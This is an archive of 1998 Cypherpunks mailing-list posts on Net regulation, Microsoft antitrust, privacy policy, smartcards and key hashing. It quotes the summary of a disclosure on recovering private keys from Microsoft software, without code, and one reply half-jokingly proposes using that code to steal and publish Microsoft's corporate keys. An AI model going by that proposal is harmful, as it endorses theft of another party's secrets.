Date: Thu, 22 Jan 1998 02:01:14 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Is cyberpass.net down?
Message-ID: <199801211752.LAA02298@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Considering the paucity of traffic and the cyberpass.net deferred time-outs
I suspect there is a problem over there.

Anyone got a clue?

Danke.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Jan 1998 01:43:05 +0800
To: cypherpunks@toad.com
Subject: CP Bust or Buyout?
Message-ID: <1.5.4.32.19980121172436.01503010@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Not much from the West Coast since the C2-CP meet on
Saturday. Were they all busted, or fragged, or has the 
underground mole hole at last been taken?

What, C2 shanghai-ed them all, with irrefusable bucks 
galore to securely distribute porn, NDA$ accomplishing 
what TLAs couldn't.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 22 Jan 1998 05:12:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <Pine.LNX.3.95.980120163439.4246A-100000@vorlon.mit.edu>
Message-ID: <v03102800b0ec097cf8e5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I was always of the understanding that the mandate for regulation of radio
and television broadcasts had to do centrally with the "allocation of
scarce resources." That is, that because there are only a finite number of
non-overlapping spectrum slots, some degree of regulation or allocation is
justified.

(I'm not saying I support this, just that this was the argument for the FCC
and related regulatory measures.)

The Internet is not constrained by a finite number of slots...capacity can
be added arbitrarily (well, at least for as many decades out as we can
imagine). And consumers can, and do, pick what they choose to download or
connect to.

The Internet is about pure speech, about publishing.  For the Gore
Commission to even _hint_ at regulating it is reprehensible.

More comments below.

At 1:34 PM -0800 1/20/98, Declan McCullagh wrote:
>Date: Tue, 20 Jan 1998 16:20:23 -0500
>From: Alan Moseley <amoseley@clark.net>
>To: declan@well.com
>Subject: the Gore Commission and digital media
>
>The Gore Commission -- the group created by Clinton to determine the
>future public interest obligations of digital TV broadcasters -- showed
>signs last week of broadening its reach to include other digital media
>that can deliver broadcast-like audio and video.

Just because the Internet can deliver audio and video signals is hardly a
matter of "allocating scarce resources." Video rental stores can also
deliver video signals, but there is no (well, modulo the "obscenity" laws
in various communities) regulation of these sources.


--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 22 Jan 1998 16:27:09 +0800
To: Steve Schear <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: NYT compression proposal
In-Reply-To: <199801190230.UAA19688@einstein.ssz.com>
Message-ID: <3.0.5.32.19980121141039.00840100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 8:30 PM -0600 1/18/98, Jim Choate wrote:
>>It has been proposed to compress the keys from 100 cypherpunks down 
>>to a 64 character add in the NYT. 

Obviously you can't compress the keys themselves, and if you just take
a short chunk of each key, you don't have enough entropy to be useful.
But you can make a file with all the keys, hash the file, and post
the hash and an URL for the file.  That lets you use 128 or 160 bits
of hash.  That's plenty of room, and has full-strength security.
If you want to do a 32-character message, it's tighter;
using the usual 6-bit characters, 128 bits of hash takes 22 chars,
and 160 bits takes 27.  If you use the btoa encoding, which puts
4 bytes of binary into 5 bytes of ascii (if the 85 characters
it uses can all be printed in the NYT's fonts), that's
20 for 128 or 25 for 160.  So you have up to 12 characters left.

So how short a URL can you do?  With some cooperation from Vince, 
you can probably do 2 characters - "ai", which should retrieve 
http://ai/index.html (currently www.ai does.).  I don't know if
Netscape will let you retrieve this - I tried it, and got the 
index page for www.ai.com, using the Netscape "try adding .com" hack.
(If you use the hack, "a" is shorter, but you'll need to
give the IANA a good excuse for using the a.com reserved name.
And keys.com is a company in the Florida Keys, but maybe they'd
be friendly.)  The shortest URL that really looks like an URL
is probably www.ai .

If the NYT insists on a phone number, that's 10-11 characters,
so you'll need a shorter hash :-)  Is 64 bits enough?  It's
long enough that it's hard to brute-force, and you probably
don't need to worry about birthday attacks, though it's
still uncomfortably short. 
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 22 Jan 1998 04:45:15 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: SC rules 1st doesn't cover lies [CNN]
Message-ID: <199801212040.OAA03251@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>      
>          SUPREME COURT: GOVERNMENT AGENCIES CAN PUNISH WORKERS WHO LIE
>                                        
>      January 21, 1998
>      Web posted at: 2:53 p.m. EST (1953 GMT)
>      
>      WASHINGTON (AP) -- Government agencies can punish employees who lie
>      while being investigated for employment-related misconduct, the
>      Supreme Court ruled unanimously Wednesday.
>      
>      The court overturned rulings in five separate cases that had barred
>      federal agencies from stiffening the disciplinary action taken
>      against wayward employees based on false statements they made when
>      questioned about their misconduct.
>      
>      Although the decision dealt with federal employees, its rationale
>      appeared to affect state and local government employees as well.
>      Chief Justice William H. Rehnquist wrote for the court that nothing
>      in the Constitution nor any federal law bars such punishment.
>      
>      "A citizen may decline to answer the question, or answer it
>      honestly, but he cannot with impunity knowingly and willfully answer
>      with a falsehood," Rehnquist said.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Thu, 22 Jan 1998 07:50:05 +0800
To: Alan Olsen <alan@clueserver.org>
Subject: Re: Intel introduces new compression technology for surfers  [CNN]
In-Reply-To: <199801201459.IAA26531@einstein.ssz.com>
Message-ID: <v03102807b0ec38d520be@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



>At 08:59 AM 1/20/98 -0600, Jim Choate wrote:
>>
>>Forwarded message:
>>
>>>    
>>>               INTEL INTRODUCES TECHNOLOGY TO SURF THE WEB FASTER
>>>                                        
>>>      January 19, 1998
>>>      Web posted at: 9:35 p.m. EST (0235 GMT)
>>>      
>>>      HILLSBORO, Oregon (AP) -- The World Wide Wait may be over.
>>>      
>>>      Computer chip giant Intel on Monday announced a way for Internet
>>>      surfers to download images twice as fast over regular phone lines
>>>      without any special equipment or software -- but it will add about
>>>      $5 to monthly access fees.
>>>      
>>>      The technology called Quick Web is installed on the computers called
>>>      servers that Internet services use to store and relay data. The
>>>      combination of Intel hardware and special software compresses all
>>>      the graphic images that are piped through the server, boosting
>>>      access speed.
>>>      
>>>      "The more pictures on the screen, the faster it is," said Dave
>>>      Preston, Internet marketing manager for Intel.
>
>This sounds like a real interesting scam.  Graphic files on servers are
>already compressed.  Have they found some way to compress already
>compressed files?  And if it does not require special software at the
>client end, then they must be decompressing it before sending the file.
>
>Or maybe they just convert all the images to low quality jpegs.
>
>This has "Idea from Marketing" written all over it.

Maybe they dynamically turn off the modem compression feature at both ends during an image download.  LZW-like compression actually adds overhead to files which are non-text based.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@vorlon.mit.edu>
Date: Thu, 22 Jan 1998 05:16:56 +0800
To: cypherpunks@cyberpass.net
Subject: Microsoft and DoJ: which one has guns?
Message-ID: <Pine.LNX.3.95.980121155838.21100B-100000@vorlon.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



A long-sounded theme at least on cpunks...


---------- Forwarded message ----------
Date: Wed, 21 Jan 1998 12:51:19 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: FC: More on Don Boudreaux "Calm Down" letter on Microsoft

My article on the politics of antitrust:

 http://cgi.pathfinder.com/netly/opinion/0,1042,1678,00.html

-Declan

********

Date: Wed, 21 Jan 1998 14:35:48 -0500
From: James Love <love@cptech.org>
To: declan@well.com
Subject: Re: FC: "Calm down!" -- Don Boudreaux letter to NYT on Microsoft

Calm down Don Bx, 

    If Microsoft really has great software, it doesn't need to use these
heavy handed tactics.  jl
-- 
James Love
Consumer Project on Technology
P.O. Box 19367, Washington, DC 20036
love@cptech.org | http://www.cptech.org
202.387.8030, fax 202.234.5176

**********

Date: Wed, 21 Jan 1998 15:09:14 -0500
From: Don Bx <dboudreaux@fee.org>
To: Declan McCullagh <declan@well.com>
Subject: Re: FC: "Calm down!" -- Don Boudreaux letter to NYT on Microsoft (fwd)

Sincere thanks to all who wrote in response to my letter to the NY Times.

One point: Vigorous competition and clever marketing are NOT
anticompetitive.  Yes, Microsoft owes much of its success to hard
bargaining; yes, Microsoft is a wiz at marketing; and yes, Microsoft's
products are not as good (in an engineering or technical sense) as are some
products produced by rivals.

But antitrust law is meant neither to outlaw hard bargaining and marketing,
nor to ensure that only the technologically best products survive on the
market.  Too many computer experts wrongfully infer from the fact that MS's
products aren't the best available to the conclusion that, therefore, MS's
success is illegitimate.
Such a conclusion would be like saying that General Motors's success is
illegitimate in light of the fact that Lexus and Porshe make better
automobiles.

Bill Gates may be an ass; I don't know and I don't care.  I never met the
man.  But I do know that antitrust law has done great damage to this
nation's economy during the past 100+ years.  The DOJ has guns; Bill Gates
doesn't.  When DOJ enters the picture, it literally threatens to shoot
consumers and businesses who refuse to do as it says; Bill Gates makes no
such threats.  For that reason alone I'm all for keeping Bill Gates free of
government interference.

Don Boudreaux




--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 22 Jan 1998 08:07:34 +0800
To: cypherpunks@cyberpass.net
Subject: Will bureaucrats turn the Net into TV? Note from FCC
Message-ID: <Pine.GSO.3.95.980121160005.2838D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



A note from an acquaintance formerly at the FCC. --Declan


---------- Forwarded message ----------

Having spedt my years at the FCC doing pre-repeal Fairness Doctrine and
Sec. 315 equal time matters, I think [deleted-dm]'s concerns, tho'
justified politically [because most adminsitrations will leave no good
technology unhobbled] are without substantial legal basis.

The hook for the Fairness Doctrine obligation imposed on broadcasters as a
corollary to their statutory 'public interest' obligations was as a
licensee of scarce broadcast spectrum--a discrete frequency awarded on a
putatively compettive basis. 

Those key elements[scarcity/license/obligation] are--for now--lacking in
the on-line environment.  And while no doubt this or another
Administration, or wiley Congressional staffer could gin up a plausable
nexus between the web and interstate commerce, sufficiient to sustain a
new public interest obligation, I think we're two or three generations of
bandwith scarcity away from that becoming a compelling element of a
cyber-resource allocation scheme. 

Without that overarching allocation-based [license] compulsion (to force
even facial compliance with an obligation, so that enforcement would
become essential to compliance, thus creating a need for thousands of Web
police to review commercial licensees sites and traffic--[what a
nightmare] -) -the liklihood of developing a meaningful scheme of public
interest obligation would be a an overdebated and overhyped PC exercise,
quickly becoming comic--and then dangerous. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 22 Jan 1998 08:58:29 +0800
To: Information Security <guy@panix.com>
Subject: Re:  Latest smartcard software
In-Reply-To: <199801211005.FAA12259@panix2.panix.com>
Message-ID: <v04003a03b0ec488dc037@[130.248.15.32]>
MIME-Version: 1.0
Content-Type: text/plain



guy wrote:
>   >   From cypherpunks-errors@toad.com Wed Jan 21 03:38:35 1998
>   >
>   >   The Independent Smartcard Developer Association, the only non-vendor
>   >   controlled smartcard related industry organization, announces their
>latest
>   >   release of SIO/STEST.
>   >
>   >   SIO/STEST is a developer toolkit that provides drivers for most popular
>   >   smartcard readers as well as card support for a wide range of crypto
>   >   capable smartcards. SIO/STEST provides the tools required by the
>   >   application programmer to integrate smartcards with their application.
>   >
>   >   As always, your feedback is appreciated.
>
>Is this for a "cypherpunks" smartcard, or for hacking them?
>
>Smartcards tend to be transponders, and to want to gobble up
>all other cards...bad card, bad card.
>
[ Excerpt from the Cryptography Manifesto snipped ]

>
>They'll say hey, you've already surrendered your biometric number
>during fingerprinting for driver's licenses.
>
>It will be too late.
>
>The high-tech American Leviathan will be in place.
>
>
All the more reason to distribute information on how
to read from and write to the cards.

-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Thu, 22 Jan 1998 09:31:06 +0800
To: cypherpunks@toad.com
Subject: Ultra computer
Message-ID: <19980122011204.22624.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Ultra computer which NEC had the calculation speed of the world
maximum of about 1000 times of the super computer to was decided
to be developed. 
Ultra computer will be completed in 2001. 
It has the performance that the calculation which takes 10000 years
with the personal computer is made of 3, 4 days. 



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 22 Jan 1998 06:59:08 +0800
To: cypherpunks@cyberpass.net
Subject: Privacy as Censorship -- Cato Institute policy analysis
Message-ID: <v03007809b0ec2808bed2@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



If you care about electronic privacy, read this new report. It correctly
says that many proposals to create new "privacy rights" become censorship
by another name. The paper is at:
   http://www.cato.org/pubs/pas/pa-295.html

-Declan

*******

http://www.cato.org/pubs/pas/pa-295es.html

PRIVACY AS CENSORSHIP: A Skeptical View of Proposals to Regulate
Privacy in the Private Sector

by Solveig Singleton (solveig@cato.org), director of information
studies at the Cato Institute.

Executive Summary

Some privacy advocates urge the adoption of a new legal regime for
the transfer of information about consumers among private-sector
databases. This "mandatory opt-in" regime would require private
businesses to ask for a consumer's permission before trading
information about that consumer, such as his buying habits or
hobbies, to third parties. This would, in effect, create new
privacy rights.

These new rights would conflict with our tradition of free speech.
>From light conversation, to journalism, to consumer credit
reporting, we rely on being able to freely communicate details of
one another's lives. Proposals to forbid businesses to communicate
with one another about real events fly in the face of that
tradition.

New restrictions on speech about consumers could disproportionately
hurt small businesses, new businesses, and nonprofits. Older,
larger companies have less need for lists of potential customers,
as they have already established a customer base.

We have no good reason to create new privacy rights. Most
private-sector firms that collect information about consumers do so
only in order to sell more merchandise. That hardly constitutes a
sinister motive. There is little reason to fear the growth of
private-sector databases.

What we should fear is the growth of government databases.
Governments seek not merely to sell merchandise but to exercise
police and defense functions. Because governments claim these
unique and dangerous powers, we restrict governments' access to
information in order to prevent abuses. Privacy advocates miss the
target when they focus on the growth of private-sector databases.

To view the entire document:
  http://www.cato.org/pubs/pas/pa-295.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Thu, 22 Jan 1998 07:24:02 +0800
To: Alan Olsen <alan@clueserver.org>
Subject: Re: Intel introduces new compression technology for surfers  [CNN]
In-Reply-To: <3.0.5.32.19980121091153.034e0100@clueserver.org>
Message-ID: <Pine.SUN.3.96.980121172712.6608A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Jan 1998, Alan Olsen wrote:

> This sounds like a real interesting scam.  Graphic files on servers are
> already compressed.  Have they found some way to compress already
> compressed files?  And if it does not require special software at the
> client end, then they must be decompressing it before sending the file.
> 
> Or maybe they just convert all the images to low quality jpegs.
> 
> This has "Idea from Marketing" written all over it.

>From the sounds of it, it's a glorified caching scheme.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Jan 1998 08:40:23 +0800
To: Steve Schear <schear@lvdi.net>
Subject: Re: [Long] How to recover private keys for various Microsoft products
In-Reply-To: <v03102800b0eab79afcbc@[208.129.55.202]>
Message-ID: <199801220050.TAA25337@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03102800b0eab79afcbc@[208.129.55.202]>, on 01/20/98 
   at 12:43 PM, Steve Schear <schear@lvdi.net> said:

>At 4:29 AM +0000 1/21/98, Peter Gutmann wrote:
>>    How to recover private keys for Microsoft Internet Explorer, Internet
>>            Information Server, Outlook Express, and many others
>>                                      - or -
>>                 Where do your encryption keys want to go today?
>> 
>>                    Peter Gutmann, <pgut001@cs.auckland.ac.nz>
>> 
>>Summary
>>-------
>> 
>>Microsoft uses two different file formats to protect users private keys, the
>>original (unnamed) format which was used in older versions of MSIE, IIS, and
>>other software and which is still supported for backwards-compatibility reasons
>>in newer versions, and the newer PFX/PKCS #12 format.  Due to a number of
>>design and implementation flaws in Microsofts software, it is possible to break
>>the security of both of these formats and recover users private keys, often in
>>a matter of seconds.  In addition, a major security hole in Microsofts
>>CryptoAPI means that many keys can be recovered without even needing to break
>>the encryption.  These attacks do not rely for their success on the presence of
>>weak, US-exportable encryption, they also affect US versions.
>> 
>>As a result of these flaws, no Microsoft internet product is capable of
>>protecting a users keys from hostile attack.  By combining the attacks
>>described below with widely-publicised bugs in MSIE which allow hostile sites
>>to read the contents of users hard drives or with an ActiveX control, a victim
>>can have their private key sucked off their machine and the encryption which
>>"protects" it broken at a remote site without their knowledge.
>> 


>Seems a good way to teach M$ a security lesson is to use Peter's code to
>snatch M$' ant significant keys on their corporate servers and publish. 
>Of course, they're probably too smart to leave important data just lying
>around on unsecure '95/NT servers and instead use Linux ;-)

More than likely they have them tucked away on one of the AS/400's they
are running at Redmond. :)


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Dos: Venerable.  Windows: Vulnerable.  OS/2: Viable.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMaGDI9Co1n+aLhhAQHicwP+NNIDJcNmdJjW294Pr6BEMvuOHmpcm8yk
AijqKWmSerz/D/VDD1zh7FwRNhkMD9qEkEXO4molAIsomo49NgBs8MhEIBSW7FhC
yj2lEZ5/xNGy+SVOoEpWywQD+KpU3FZftHIBUcQE0o7Wc+0AnjHfcUUDgjDkumCF
98Qe8bFqQyg=
=Z4ph
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 22 Jan 1998 16:22:36 +0800
To: cypherpunks@toad.com
Subject: Candidate Blacknet Customer :-)
Message-ID: <3.0.5.32.19980121183540.00840100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.newsmait.com  has a section called the 
"Newspaper Intelligence Page", which has anonymized comments from 
newspaper reporters about what their (current or former) newspaper
working environments are like.  Aside from the usual issues
that any site for griping about work offers, this site provides
a lot of insight into the media business  - how much freedom do
writers have, what kinds of topics get squashed, what the biases
of the editors and management are like.  The folks who run the site
have some obvious concerns about lawsuits.

Looks like a good candidate for a Blacknet-style web site...

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 22 Jan 1998 10:51:32 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Will bureaucrats turn the Net into TV? Note from FCC
In-Reply-To: <Pine.GSO.3.95.980121160005.2838D-100000@well.com>
Message-ID: <199801220247.SAA12030@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



does anyone else smell a bureacrat writing that article?

>Without that overarching allocation-based [license] compulsion (to force
>even facial compliance with an obligation, so that enforcement would
>become essential to compliance, thus creating a need for thousands of Web
>police to review commercial licensees sites and traffic--[what a
>nightmare] -) -the liklihood of developing a meaningful scheme of public
>interest obligation would be a an overdebated and overhyped PC exercise,
>quickly becoming comic--and then dangerous. 

whoa, someone claiming that the government won't do something because
it would lead to a horrible increase in the number of bureacrats or
federal police?

hmmmmmmmm, somehow I don't feel so reassured.

here is another reason the net won't be regulated: because it
is like society's nervous system, and freedom of expression and
speech has finally found a tangible outlet and form after
centuries of attempts. "freedom of press"
only applies to those who have a press, yet freedom of web sites
belongs to anyone who can scrounge up $5/mo. (I promise you I am
now paying that amount for a site).

moreover, the net has become a powerful economic force. there are
tens of thousands of people now making their living directly or
indirectly off the net. any attempt to change its chemistry will
involve a backlash from some of the most intelligent and motivated
people on the planet.

people don't care too much about american politics, but any attempt
to mess with the internet will be slapped hard by the population, 
which is finally getting a clue about what the words
"participatory democracy" mean. it would be political suicide. this
is not to say that some idiot politicians will continue to experiment.
<g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Thu, 22 Jan 1998 05:46:32 +0800
To: rantproc <cypherpunks@cyberpass.net>
Subject: Revenge on the Nerds  -Maureen on a rampage
Message-ID: <19980121.080832.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

    and everyone thought I have been blowing smoke over the
    few years over the need to dismember Micro$haft. More
    aye-sayers than naysayers have joined the fray, some even
    eloquently.  even the opinion polls are against BadBillyG:
    bubba is more trusted! as is the government...
    
    Mickey$lop no longer generates terror in the hearts of 
    everyone --just the OEMs who can not afford to even testify
    for fear of retaliation --and it is a real fear.

    keep your fire extinguisher handy.
    Maureen is really smoking!

January 21, 1998
NYTimes OpEd Columnist
LIBERTIES / By MAUREEN DOWD
Revenge on the Nerds

WASHINGTON -- I figured things were way out of perspective
in the Other Washington when I heard that Bill Gates had put
an inscription from "The Great Gatsby" around the domed
ceiling of the library in his new $100 million pad:  "He had
come a long way to this blue lawn and his dream must have
seemed so close that he could hardly fail to grasp it."

Bill Gates was obviously unaware of the magnitude of the
truth that he had unwittingly admitted.

When he read about the blue lawn, he must have imagined
computers with glowing blue screens stretching to infinity.
And he must certainly have liked the proximity of the words
"dream" and "grasp."

With a judge who is likely soon to hold Microsoft in
contempt for petulantly defying an order designed to give
its rivals any chance, Mr. Gates's dream may at last have
exceeded his grasp.  The Justice Department never came down
on Gatsby.

This Washington has disabused that Washington of its
arrogant presumption that what's good for Microsoft is good
for America.  This Washington has stripped that Washington
of its image as warm, tender, flannel-and-soyburger pioneers
of the new economy, and properly pegged Microsoft as an
egomaniacal, dangerous giant that has cut off the air supply
of competitors in a bid to control cyberspace.

"The only thing the robber barons did that Bill Gates hasn't
done is use dynamite against their competitors," Gary
Reback, a Silicon Valley antitrust lawyer, told John
Heilemann of The New Yorker.

The disheveled college dropout who used to get adoring
headlines like "A Regular Guy Who's a Legend:  Bill Gates
Puts a New Face on the American Dream" now looks like a
spoiled rich brat.  When they treated the Justice Department
and the judge with the same contempt with which they treat
competitors, the masters of the virtual universe got hit
with a grim truth:  People hate Microsoft even more than
they hate the Government.

Mr.  Gates has gone from Horatio Alger similes to virus
similes.  Frederick Warren-Boulton, another antitrust
expert, told The New Yorker:  "Gates is like smallpox.  You
have to go in there and you have to nail it.  If you leave
it lying around, it will just come back."

When asked who they thought had done more good for the
future of America, Bill Gates or Bill Clinton, more
Americans chose Mr.  Clinton.  (Even though
portfolio-obsessed Americans would still rather have their
children grow up to be more like Mr. Gates than Mr.
Clinton, by 47 to 24 percent.)

As Jacob Weisberg plaintively wrote in Slate, Microsoft's
on-line magazine:  "A few months ago, everyone I met seemed
to think that working for Microsoft was a pretty cool thing
to do.  Now, strangers treat us like we work for Philip
Morris."

The Times's Timothy Egan explored the angst that has gripped
the Redmond campus since Microsoft lost its sheen.  Some
fret that the fate of the entire Pacific Northwest is at
stake.

All the instant millionaires in thermal shirts, droopy
drawers and sandals with wool socks are suddenly Wondering
If It's All Worth It.  They have staggered out of the
Seattle fog long enough to listen to their inner browsers.

This has been a rude shock to them because they honestly
believed that our Washington was full of anti-business,
careerist bureaucrats, and their Washington was full of
imaginative idealists and entrepreneurs who buy and sell to
the beat of a different drum.  They didn't reckon smokestack
laws could apply to high technology.

As Mr. Gates's lawyer, William Neukom, told Steve Lohr of
The Times, "We sincerely believe that we are a force for
good in the economy."  Actually, Microsoft has been a force
for greed in the economy, more brilliant at marketing and
purloining and crushing than it has been at innovating.  The
company saw the fight with the Justice Department as a
defense of its way of life.  And that way was hardball on
software; anything it decided was a core threat to Microsoft
was sucked into the operating system.

These are Darwinian nerds.  Besides, Microsoft couldn't even
save the universe in "Independence Day."  It took an Apple
to do that.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNMZSQ7R8UA6T6u61AQH2fgH+OQT3p1cE1lRxSzMvhyt9AvvH2N3jFUmO
UZzpqRbrn9pB1VPxZLKG2lgBwOW4hPIlpFRWg8Fp+Uu6KoL6kKObuw==
=n+/c
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Thu, 22 Jan 1998 09:28:49 +0800
To: cypherpunks@Algebra.COM
Subject: ITAR is back!
Message-ID: <34C69FE3.4B0159A7@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Those of you who thought that ITAR was dead had better
check this out -- http://www.itar-tass.com/

Aparently, ITAR has found a new home...  :-)

Note that they are running Sun / Elvis+.

--David Miller

middle  rival
devil rim lad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 22 Jan 1998 09:57:37 +0800
To: cypherpunks@toad.com
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <19980121.080832.attila@hun.org>
Message-ID: <B9PoJe20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"Attila T. Hun" <attila@hun.org> writes:

>     and everyone thought I have been blowing smoke over the
>     few years over the need to dismember Micro$haft. More
>     aye-sayers than naysayers have joined the fray, some even
>     eloquently.  even the opinion polls are against BadBillyG:
>     bubba is more trusted! as is the government...

I don't know why there's somuch mickeysoft-related traffic all of a sudden,
but here are a couple of rants:

Jack Aaron's, the commodities division of Goldman Sachs, controls inter alia
like 99% of US coffee supply.  if you try to circumvent their monopoly,
by trying to import a material amount of coffee, whether it's the cheap shit
for proles or the high-end caffeine fix from Kenya, you and your suppliers
just might find yourself in a lot more trouble that the computer manusfacturers
who were reluctant to put the free mickeysoft browser on their dekstop.
Why doesn't DOJ come down on Goldman Sachs?  Does it have anything to do with
the fact that a Goldman Sachs partner is in Clinton's cabinet?

Speaking of browsers: I'd rather *pay* for a browser that has such an obvious
feature as a list of URL regexps that you don't want to browse. Neither IE
nor Netscape has it. I don't know about Lynx.  I'm now using junkbuster
from www.junkbuster.com (highly recommended) to filter out ads and banners
and cookies. I generally think WWW sucks; but if I use it, I want to be able
to tell the browser that if the page tried to load an image from a URL
that looks like

valueclick.com
bannermall.com
adforce.*.com/
bannerweb.com
eads.com/
/*/sponsors/*.gif
*banner*.gif
/image/ads/

etc etc, I want the browse to ignore this request. Clearly Microsoft and
Netscape both don't give a damn about the desires of their NON-PAYING users
and would rather bend over for the advertisers.

Wow, two rants for the price of one.

---

Dr.Dimitri Vulis KOTM
